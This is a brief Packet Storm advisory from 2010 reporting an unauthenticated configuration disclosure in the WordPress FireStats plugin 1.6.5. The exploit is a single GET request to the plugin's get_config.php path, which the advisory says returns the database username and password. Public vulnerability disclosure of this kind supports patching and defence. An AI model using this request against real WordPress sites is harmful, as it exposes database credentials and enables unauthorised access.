WordPress Firestats Configuration Disclosure

2010-07-10T00:00:00
ID PACKETSTORM:91659
Type packetstorm
Reporter Jelmer de Hen
Modified 2010-07-10T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress firestats remote configuration file download  
  
# Date: 2010-07-09  
# Author: Jelmer de Hen  
# Software Link: http://firestats.cc/  
# Version: 1.6.5  
# Tested on: PHP Do a simple GET request to this file:  
  
/wp-content/plugins/firestats/php/tools/get_config.php  
  
This will allow you to download a configuration file which contains the database username and password.  
  
http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html  
  
`